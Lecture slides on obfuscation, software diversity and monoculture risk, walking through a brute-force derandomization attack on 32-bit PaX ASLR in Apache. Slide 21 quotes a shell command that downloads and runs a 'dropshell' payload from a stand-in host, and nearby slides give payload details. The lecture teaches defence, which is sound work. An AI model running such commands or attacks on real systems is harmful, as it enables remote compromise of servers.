obfuscation and diversity
play

Obfuscation and Diversity: Probabilistic System Security Kyle - PowerPoint PPT Presentation

Nov 03, 2022 •281 likes •665 views

Obfuscation and Diversity: Probabilistic System Security Kyle Croman CS6410: Advanced Systems Definitions Obfuscation: T o be evasive, unclear, or confusing* In context, this means making a system difficult to understand and

  1. Obfuscation and Diversity: Probabilistic System Security Kyle Croman CS6410: Advanced Systems

  2. Definitions  Obfuscation:  T o be evasive, unclear, or confusing*  In context, this means making a system difficult to understand and analyze  Diversity:  The condition of having or being composed of differing elements*  Different applications, patch levels, hardware *Definitions from Merriam-Webster 2 Kyle Croman – Obfuscation and Diversity 10/3/2014

  3. Why are these relevant?  Security!  Obfuscation  It is much harder to break into something you don’t understand  Diversity  Virus propagation is inhibited by substantial differences between platforms 3 Kyle Croman – Obfuscation and Diversity 10/3/2014

  4. Monoculture  A collection of identical computing systems  Hardware  Operating system  Applications  Identical versions, patches, configuration, etc.  Why monocultures?  Interoperability  Ease of use/management  Significantly less expensive  Widely adopted standards  Virtualization 4 Kyle Croman – Obfuscation and Diversity 10/3/2014

  5. Monocultures – Security?  In a modern data center employing virtualization, each node is:  Running the exact same binaries  Using the exact same hardware  Configured exactly the same way  What happens when an adversary tries to exploit a vulnerability in the system?  Virus  Malicious user 5 Kyle Croman – Obfuscation and Diversity 10/3/2014

  6. PANIC!!1!  Soon, consolidated systems will be the only realistic option for large scale enterprises  Google, Microsoft, Facebook, etc.  Government  Infrastructure  Power grid, transportation, water, communication  …and it will take only a single exploit to bring down ALL of them  Okay, maybe more than one, but you get the idea 6 Kyle Croman – Obfuscation and Diversity 10/3/2014

  7. Classification of Attacks  Configuration attacks  Technology attacks  Trust attacks 7 Kyle Croman – Obfuscation and Diversity 10/3/2014

  8. Configuration Attacks  Hackers will always go for the easiest target  Misconfigured software is akin to leaving the door wide open  No exploit development required  Examples:  Factory default settings  Administrative oversights/mistakes 8 Kyle Croman – Obfuscation and Diversity 10/3/2014

  9. Configuration Error – Another example  Cat + GPS + WiFi sniffer =  People still use WEP…  (default router configuration) 9 Kyle Croman – Obfuscation and Diversity 10/3/2014

  10. Monocultures and Configuration Errors  Single or limited configuration for all nodes  Highly trained staff can come up with a robust and well- understood solution  Reduces configuration vulnerabilities  Ensures compatibility  Drawbacks  Users cannot customize their environment  Set of verified programs may be small  If there is a mistake in the global configuration, an attacker can compromise every system 10 Kyle Croman – Obfuscation and Diversity 10/3/2014

  11. Technology Attacks  Exploit programming errors or design vulnerabilities on the target system  Buffer Overflows  Logic errors  Unintended side effects  0-day exploits  Every large piece of software has bugs  This includes operating systems and applications we use on a daily basis  ―0 days‖ refers to the fact the developer has had no time to fix the previously unknown flaw before it is used in an attack 11 Kyle Croman – Obfuscation and Diversity 10/3/2014

  12. Tech Attacks in Monocultures  Two separate problems  Defending a single platform  Defending all platforms in the network  Artificial diversity addresses both issues  Take arbitrary applications and transform them WITHOUT changing or hindering their functionality  Randomization  Attacker no longer has exact knowledge of the binary being targeted 12 Kyle Croman – Obfuscation and Diversity 10/3/2014

  13. What and How Can We Randomize?  The most widespread method in use today is ASLR  Implemented at the OS level  Vista, OSX, several Linux distributions  Basic idea: when a program is loaded into memory, randomize the offsets of its various sections (stack, heap, text, libraries)  Other ideas:  Permute program code  Done at compile time or with binary rewriters  Change system call numbers on a per platform basis  Use different libraries on different platforms  Many, many more… 13 Kyle Croman – Obfuscation and Diversity 10/3/2014

  14. Trust attacks  Diversity (including randomization) increases the number of attacks that can compromise some part of the system  How can we protect against a single compromised node?  Decompose network into subnets or enclaves  Fine-grain authorization protocol to limit interaction between nodes 14 Kyle Croman – Obfuscation and Diversity 10/3/2014

  15. Monocultures - Conclusion  Breaking into systems is easy  It is simply not possible to defend against all attacks  Developers can’t catch all bugs  Legacy code  Plethora of tools available to hackers and exploit developers  Artificial diversity and obfuscation go a long way towards mitigating technology attacks  How do we measure effectiveness and attacker effort?  Designed to defeat known attacks  We won’t know its broken until someone breaks it 15 Kyle Croman – Obfuscation and Diversity 10/3/2014

  16. Derandomization Attack - Background  Buffer overflow exploit to hijack control of the program  Because of W ⊕ X, modern attacks are all code reuse attacks  Return-to-libc  Loaded into every program  Encapsulates system call API  Return Oriented Programming (ROP)  Attacker needs to know the virtual addresses of the code he plans to reuse  Must derandomize code to deploy a working exploit 16 Kyle Croman – Obfuscation and Diversity 10/3/2014

  17. PaX ASLR – 32 Bit System  Randomness: Executable Mapped Stack 16 bits 16 bits 24 bits 65,536 65,536 16,777,216  Executable contains code  Mapped contains the heap and libraries 17 Kyle Croman – Obfuscation and Diversity 10/3/2014

  18. Attack - Overview  Return-to-libc attack  Created a vulnerability in their copy of Apache  Modeled after a known buffer overflow in an Oracle SQL module (strcpy to a fixed size buffer)  Does not require knowledge of stack addresses  The randomization does not change stack layout  Step 1: Brute force the offset of the mapped region  delta_mmap, 16 bits  Step 2: Use this offset to find and call system() to obtain a remote shell 18 Kyle Croman – Obfuscation and Diversity 10/3/2014

  19. Attack – Brute Force  Precompute the offset of usleep(), system(), and a ret instruction in the libc library  Repeatedly send exploits with guesses for the address of the usleep() function  On failure:  The process will crash and Apache will fork a new listener child  All children inherit the randomized offsets of their parents  As a result, the connection terminates immediately  On success:  The connection will hang for 16 seconds before terminating 19 Kyle Croman – Obfuscation and Diversity 10/3/2014

  20. Brute force - Payload  Saved EIP overwritten with guess at usleep()  Argument to usleep() is 0x01010101  Smallest number that avoids null bytes  Return address is 0xDEADBEEF  Will crash the program on return if our guess didn’t already 20 Kyle Croman – Obfuscation and Diversity 10/3/2014

  21. Remote Shell Payload  Write the shell command into the buffer  wget http://www.example.com/dropshell; chmod +x dropshell; ./dropshell  Chain address of ret instruction to eat up stack space  Necessary to obtain a pointer into the buffer as an argument  Address of system() one byte before the pointer 21 Kyle Croman – Obfuscation and Diversity 10/3/2014

  22. Results  Attacking machine:  2.4 GHz Pentium 4  Server:  Athlon 1.8 GHz  150 child processes  100 Mbps network connection  Each probe is around 200 bytes total (including packet headers)  12.8 MB of exploit payloads in the worst case  Time in seconds to exploit success Min Max Average 29 810 216 22 Kyle Croman – Obfuscation and Diversity 10/3/2014

  23. Possible Improvements to ASLR  Rerandomization  Gains only a single bit of expected trials  Fine-grain randomization  Not useful against guessing the address of a single function unless more bits of entropy can be provided  Watcher daemons to monitor crashes  Attack then becomes denial of service  64 bit architecture – larger address space  At least 40 bits of entropy – brute force infeasible 23 Kyle Croman – Obfuscation and Diversity 10/3/2014

  24. Other notes on ASLR  Information leakage attacks can bypass ASLR  Buffer overflow mitigation techniques will protect against these attacks with or without ASLR  There are attacks against these as well…  64 bit architecture seems like the best solution  But what about 32 bit legacy programs running in compatibility mode?  Better ASLR systems exist  But they often incur significant performance penalties  Diversity does not solve the problem, but it does require additional attacker effort to overcome 24 Kyle Croman – Obfuscation and Diversity 10/3/2014

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Obfuscation Lecture 26 Different Flavours VBB Obfuscation Note: Considers only corrupt

Obfuscation Lecture 26 Different Flavours VBB Obfuscation Note: Considers only corrupt

Obfuscation Lecture 26 Different Flavours VBB Obfuscation Note: Considers only corrupt receiver x 1 Virtual f O(f) F B f(x 1) Black-Box x 2 (VBB) f(x 2) Obfuscation : A Secure (and f Family f Family b b single

466 views • 18 slides
) UNION SELECT `This_Talk` AS ('New Optimization and Obfuscation Optimization and Obfuscation

) UNION SELECT `This_Talk` AS ('New Optimization and Obfuscation Optimization and Obfuscation

) UNION SELECT `This_Talk` AS ('New Optimization and Obfuscation Optimization and Obfuscation Techniques)%00 Techniques)%00 Roberto Salgado Co-founder of Websec Provide information security solutions Pen-testing, training

1.11k views • 93 slides
HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from "Hardware Protection

HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from "Hardware Protection

HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from "Hardware Protection thr Obfuscation) Circuit modification techniques designed to conceal or lock the functionality and/or circuit structure The modifications are designed

157 views • 11 slides
Lattice-Based SNARGs and Their Application to More Efficient Obfuscation Dan Boneh, Yuval Ishai,

Lattice-Based SNARGs and Their Application to More Efficient Obfuscation Dan Boneh, Yuval Ishai,

Lattice-Based SNARGs and Their Application to More Efficient Obfuscation Dan Boneh, Yuval Ishai, Amit Sahai, and David J. Wu Program Obfuscation [BGIRSVY01, GGHRSW13] Indistinguishability obfuscation ( ) has emerged as a central hub

648 views • 36 slides
Obfuscation: know your enemy Ninon EYROLLES neyrolles@quarkslab.com Serge GUELTON

Obfuscation: know your enemy Ninon EYROLLES neyrolles@quarkslab.com Serge GUELTON

Obfuscation: know your enemy Ninon EYROLLES neyrolles@quarkslab.com Serge GUELTON sguelton@quarkslab.com Introduction Control flow obfuscation Data flow obfuscation Python obfuscation Prelude Introduction Control flow obfuscation Data

1.23k views • 76 slides
OBFUSCURO : : A Commodity Obfuscation Engine for Intel SGX Adil Ahmad *, Byunggill Joe*, Yuan

OBFUSCURO : : A Commodity Obfuscation Engine for Intel SGX Adil Ahmad *, Byunggill Joe*, Yuan

OBFUSCURO : : A Commodity Obfuscation Engine for Intel SGX Adil Ahmad *, Byunggill Joe*, Yuan Xiao Yinqian Zhang, Insik Shin, Byoungyoung Lee (* denotes equal contribution) Program Obfuscation Program Obfuscation Trusted Untrusted (except

1.34k views • 116 slides
Obfuscation from LWE? proofs, attacks, candidates Hoeteck Wee CNRS & ENS . . . . . .

Obfuscation from LWE? proofs, attacks, candidates Hoeteck Wee CNRS & ENS . . . . . .

Obfuscation from LWE? proofs, attacks, candidates Hoeteck Wee CNRS & ENS . . . . . . . . C x C x C x C C c obfuscation [ BGIRSVY01, H00, GR07, GGHRSW13 ] . . . . . . . . C x C x C x C C c obfuscation [

1.03k views • 92 slides
Authorship Obfuscation Using Heuristic Search Masters Thesis Defence by Janek Bevendorff on 20

Authorship Obfuscation Using Heuristic Search Masters Thesis Defence by Janek Bevendorff on 20

Authorship Obfuscation Using Heuristic Search Masters Thesis Defence by Janek Bevendorff on 20 June 2018 Supervisors: Prof. Dr. Benno Stein, PD Dr. Andreas Jakoby Unmasking for short texts Obfuscation against unmasking Obfuscation

1.38k views • 95 slides
Engineering Code Obfuscation ISSISP 2017 - Obfuscation I Christian Collberg Department of

Engineering Code Obfuscation ISSISP 2017 - Obfuscation I Christian Collberg Department of

Engineering Code Obfuscation ISSISP 2017 - Obfuscation I Christian Collberg Department of Computer Science University of Arizona http://collberg.cs.arizona.edu collberg@gmail.com Supported by NSF grants 1525820 and 1318955 and by the

924 views • 69 slides
Fundamentals of Diversity Reception What is diversity? Diversity is a technique to combine

Fundamentals of Diversity Reception What is diversity? Diversity is a technique to combine

Fundamentals of Diversity Reception What is diversity? Diversity is a technique to combine several copies of the same message received over different channels. Why diversity? To improve link performance Methods for obtaining multiple replicas

738 views • 17 slides
Characterizing the Strength of Software Obfuscation Against Automated Attacks Sebastian Banescu,

Characterizing the Strength of Software Obfuscation Against Automated Attacks Sebastian Banescu,

Fakultt fr Informatik T echnische Universitt Mnchen Dagstuhl Seminar 17281 Characterizing the Strength of Software Obfuscation Against Automated Attacks Sebastian Banescu, BMW Group Outline 1 Introduction 2 Obfuscation in Theory 3

815 views • 69 slides
Outline A brief tour of practice diversity Its everywhere you look! Is practice diversity

Outline A brief tour of practice diversity Its everywhere you look! Is practice diversity

5/30/2014 I think Medicine has Practice diversity: What does it mean when everybody does it differently? 1. Too much practice diversity 2. Just enough practice diversity 3. Not enough practice diversity Avery Tung, M.D. FCCM Quality Chief

816 views • 24 slides
On The Complexity of Compressing Obfuscation Gilad Asharov, Naomi Ephraim, Ilan Komargodski, and

On The Complexity of Compressing Obfuscation Gilad Asharov, Naomi Ephraim, Ilan Komargodski, and

On The Complexity of Compressing Obfuscation Gilad Asharov, Naomi Ephraim, Ilan Komargodski, and Rafael Pass Cornell University and Cornell Tech CRYPTO 2018 Indistinguishability Obfuscation (iO) An obfuscator is a compiler which preserves

1.01k views • 86 slides
HOP: Hardware makes Obfuscation Practical Kartik Nayak With Chris Fletcher, Ling Ren, Nishanth

HOP: Hardware makes Obfuscation Practical Kartik Nayak With Chris Fletcher, Ling Ren, Nishanth

HOP: Hardware makes Obfuscation Practical Kartik Nayak With Chris Fletcher, Ling Ren, Nishanth Chandran, Satya Lokam, Elaine Shi and Vipul Goyal 1 Compression 1 KB 1 MB Used by everyone, perhaps license it - VBB Obfuscation No one should

942 views • 34 slides
INDISTINGUISHABILITY OBFUSCATION Mark Zhandry Stanford University * Joint work with Dan Boneh

INDISTINGUISHABILITY OBFUSCATION Mark Zhandry Stanford University * Joint work with Dan Boneh

INDISTINGUISHABILITY OBFUSCATION Mark Zhandry Stanford University * Joint work with Dan Boneh Program Obfuscation Intuition: Mangle a program Same functionality as original Hides all implementation details Potential uses: IP

295 views • 28 slides
Dissecting Diversity towards a conceptual framework for realizing diversity in

Dissecting Diversity towards a conceptual framework for realizing diversity in

Dissecting Diversity towards a conceptual framework for realizing diversity in recommendations Prof. Dr. Natali Helberger, Institute for Information Law Bozen, 29 February 2018 Central questions What is diversity? Do people encounter

521 views • 38 slides
New results on the entanglement entropy of singular regions in CFTs Pablo Bueno QUIST 2019,

New results on the entanglement entropy of singular regions in CFTs Pablo Bueno QUIST 2019,

New results on the entanglement entropy of singular regions in CFTs Pablo Bueno QUIST 2019, YITP, Kyoto University June 22, 2019 Pablo Bueno EE of singular regions in CFTs 22/06/2019 1 / 18 Talk based on arXiv:1904.11495 with Horacio

827 views • 79 slides
Topological constraints and structures in macro (fluid and plasma) systems Z. Yoshida University

Topological constraints and structures in macro (fluid and plasma) systems Z. Yoshida University

Topological constraints and structures in macro (fluid and plasma) systems Z. Yoshida University of Tokyo 2015.8.17 Z. Yoshida topological constraints 2015/08/17 1 / 23 Outline At micro, energy norm. How can macro be different from

642 views • 32 slides
First test of hybrid target Status of the experiment at KEKB for the hybrid targets Junji

First test of hybrid target Status of the experiment at KEKB for the hybrid targets Junji

First test of hybrid target Status of the experiment at KEKB for the hybrid targets Junji Urakawa instead of T.Takahashi KEK Positron Workshop Durham 28 October 2009

418 views • 22 slides
Challenges for Polarimetry at the ILC Moritz Beckmann, Anthony Hartin, Jenny List DESY - FLC

Challenges for Polarimetry at the ILC Moritz Beckmann, Anthony Hartin, Jenny List DESY - FLC

Challenges for Polarimetry at the ILC Moritz Beckmann, Anthony Hartin, Jenny List DESY - FLC EUCARD Workshop Spin optimization at Lepton accelerators Mainz, Germany February 12, 2014 Outline Introduction Polarimetry in the ILC

472 views • 46 slides
vPFS +: Managing I/ O Performance for Diverse HPC Applications Ming Zhao, Arizona S tate

vPFS +: Managing I/ O Performance for Diverse HPC Applications Ming Zhao, Arizona S tate

vPFS +: Managing I/ O Performance for Diverse HPC Applications Ming Zhao, Arizona S tate University Yiqi Xu, VMware ht t p:/ / visa.lab.asu.edu V irtualized I nfrastructures, S ystems, & A pplications Background: HPC I/ O Management

168 views • 16 slides
Introduction cont. Lecture goal: Overview: get context, overview, access net, physical

Introduction cont. Lecture goal: Overview: get context, overview, access net, physical

Introduction cont. Lecture goal: Overview: get context, overview, access net, physical media feel of networking performance: loss, delay more depth, detail later in course protocol layers, service models approach:

393 views • 12 slides
Reconstruction CSE 576 Ali Farhadi Several slides from Steve Seitz, Larry Zitnick, Lana

Reconstruction CSE 576 Ali Farhadi Several slides from Steve Seitz, Larry Zitnick, Lana

Reconstruction CSE 576 Ali Farhadi Several slides from Steve Seitz, Larry Zitnick, Lana Lazebnik, Carlos Hernndez, George Vogiatzis,Yasutaka Furukawa 3d model Digital copy of real object Allows us to Inspect details

698 views • 59 slides
Autonomous Cars for City Traffic Ral Rojas and the AutoNOMOS Team Freie Universitt Berlin

Autonomous Cars for City Traffic Ral Rojas and the AutoNOMOS Team Freie Universitt Berlin

Autonomous Cars for City Traffic Ral Rojas and the AutoNOMOS Team Freie Universitt Berlin Fachbereich Mathematik und Informatik Dahlem Center for Intelligent Systems Topics Motivation The experimental vehicles Sensors Navigation and

730 views • 53 slides

More recommend